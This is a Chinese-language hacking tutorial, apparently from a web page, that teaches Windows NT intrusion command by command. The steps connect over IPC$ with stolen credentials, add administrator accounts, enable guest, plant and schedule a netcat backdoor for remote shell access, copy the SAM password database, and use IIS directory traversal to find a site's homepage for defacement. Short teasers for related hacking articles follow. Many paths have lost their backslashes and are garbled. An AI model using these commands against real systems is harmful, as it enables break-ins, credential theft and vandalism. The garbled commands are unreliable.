1∶net 只要你擁有某ip的使用者名稱和密碼,那就用ipc$做連線吧! 這裡我們假如你得到的使用者是hbx,密碼是123456。假設對方ip為127.0.0.1 net use /127.0.0.1ipc$ "123456" /user:"hbx" 退出的命令是 net use /127.0.0.1ipc$ /delte 下面的*作你必須登陸後才可以用.登陸的方法就在上面. ---------------------- 下面我們講怎厶建立乙個使用者,由於sa的許可權相當於系統的超級使用者. 我們加乙個heibai的使用者密碼為lovechina net user heibai lovechina /add 只要顯示命令成功,那厶我們可以把他加入administrator組了. net localgroup administrators heibai /add ---------------------- 這裡是講對映對方的c盤,當然其他盤也可以,只要存在就行了.我們這裡把對方的c盤對映到本地的z盤. net use z:/127.0.0.1c$ ---------------------- net start telnet 這樣可以開啟對方的telnet服務. ---------------------- 這裡是將guest使用者啟用,guest是nt的預設使用者,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。 net user guest /active:yes ---------------------- 這裡是把乙個使用者的密碼改掉,我們把guest的密碼改為lovechina,其他使用者也可以的。只要有許可權就行了呀! net user guest lovechina net命令果然強大啊! 2:at 一般乙個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎厶啟動他呢? 那厶需要用at命令,這裡假設你已經登陸了那個伺服器。 你首先要得到對方的時間, net time /127.0.0.1 將會返回乙個時間,這裡假設時間為12:1,現在需要新建乙個作業,其id=1 at /127.0.0.1 12:3 nc.exe 這裡假設了乙個木馬,名為nc.exe,這個東西要在對方伺服器上. 這裡介紹一下nc,nc是netcat的簡稱,為了方便輸入,一般會被改名.它是乙個telnet服務,埠為99. 等到了12:3就可以連線到對方的99埠.這樣就給對方種下了木馬. 3:telnet 這個命令非常實用,它可以與遠方做連線,不過正常下需要密碼、使用者,不過你給對方種了木馬,直接連到這個木馬開啟的埠. telnet 127.0.0.1 99 這樣就可以連到對方的99埠.那你就可以在對方執行命令了,這個也就是肉雞. 4:ftp 它可以將你的東西傳到對方機子上,你可以去申請個支援ftp上傳的空間,國內多的是,如果真的找不到,我給www.51.net,不錯的.當我們申請完後,它會給使用者名稱,密碼,以及ftp伺服器. 在上傳前需要登陸先,這裡我們假設ftp伺服器www.51.net,使用者名稱是hucjs,密碼是654321 ftp http://www.51.net 他會要求輸入使用者,成功後會要求輸入密碼. ---------------------- 下面先說上傳,假設你需上傳的檔案是index.htm,它位於c:下,傳到對方d: get c:index.htm d: 假設你要把對方c盤下的index.htm,下到你的機子的d盤下 put c:index.htm d: 5:copy 下面我說說怎樣把本地的檔案複製到對方硬碟上去,需要建立好ipc$連線才有效。 這裡我們把本地c盤下的index.htm複製到127.0.0.1的c盤下 copy index.htm /127.0.0.1c$index.htm ---------------------- 如果你要複製到d盤下把c改為d,就行了! copy index.htm /127.0.0.1d$index.htm ---------------------- 如果你要把他複製到winnt目錄裡 就要把輸入 copy index.htm /127.0.0.1admin$index.htm admin$是winnt ---------------------- 要把對方的檔案複製過來,順便告訴大家nt的備份的資料庫放在x:winnt epairsam._ sam._是資料庫的檔名 下面就把127.0.0.1的資料庫複製到本地c盤下 copy /127.0.0.1admin$ epairsam._ c: ---------------------- 6∶set 如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80埠要開,不然你黑給誰看。這時需要用set命令! 下面是我得到的結果!我來分析它,只是找主頁在那而已。 computername=pentiumii comspec=d:winntsystem32cmd.exe content_length=0 gateway_inte***ce=cgi/1.1 http_accept=*/* http_accept_language=zh-cn http_connection=keep-alive http_host=當前登陸者的ip,這裡本來是顯示我的ip,被我刪除了 http_accept_encoding=gzip, deflate http_user_agent=mozilla/4.0 (compatible; msie 5.0; windows 98; digext) number_of_processors=1 os2libpath=d:winntsystem32os2dll; os=windows_nt path=d:winntsystem32;d:winnt pathext=.com;.exe;.bat;.cmd path_translated=e:vlroot主頁放在的位址,只要你看到path_translated=的後面就是主頁的存放位址。這裡是e:vlroot processor_architecture=x86 processor_identifier=x86 family 6 model 3 stepping 3, genuineintel processor_level=6 processor_revision=0303 prompt=$p$g query_string=/c+set remote_addr=xx.xx.xx.xx remote_host=xx.xx.xx.xx request_method=get
script_name=/
scripts/..%2f../winnt/system32/cmd.exe server_name=xx.xx.xx.xx server_port=80 server_port_secure=0 server_protocol=http/1.1 server_software=microsoft-iis/3.0對方使用iis/3.0 systemdrive=d: systemroot=d:winnt tz=gmt-9 userprofile=d:winntprofilesdefault user windir=d:winnt 粉紅色的那行就是對方主頁存放位址,這裡告訴大家乙個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你dir這個目錄時,一定會看到很多檔案,你可以把所有檔案在瀏覽器這樣輸入xx.xx.xx.xx/檔名,這樣只要看到和xx.xx.xx.xx看到的也面一模一樣,那厶這就是主頁的名稱了。
黑客常用的攻防命令
ping命令 使用ping命令可以測試目標主機的主機名 ip位址資訊,還可以驗證本地主機與遠端主機之間的連線。ping命令是基於tcp ip協議連線的,只有在安裝tcp ip協議後才能使用這命令 ping 命令的格式為 ping t ping指定的主機,直到停止。若要檢視統計資訊並繼續操作,則按co...
幾種簡單的黑客攻防技術
正所謂技術是一把雙刃劍,黑客可以利用自己的技術攻擊別人的電腦,然而掌握黑客攻防技術也可以讓使用者更好的在網際網路中暢遊。今天就為大家簡單的介紹一下幾種黑客攻防技術。黑客攻防之資訊收集型攻擊 資訊收集型攻擊並不對目標本身造成危害,如名所示這類黑客攻擊被用來為進一步入侵提供有用的資訊。主要包括 掃瞄技術...
台式電腦技術的ATM易遭黑客入侵
有人拍到過atm的windows錯誤提示 安全專家已用例項證明,仰賴台式電腦技術的自動櫃員提款機 atm 易遭黑客入侵,導致金錢和銀行帳戶資料遭竊。現代的atm面臨來自網際網路的各種威脅,例如被蠕蟲及阻斷服務 denial of service 攻擊,或遭到收集顧客資料 綁架機器的惡意程式入侵。專家...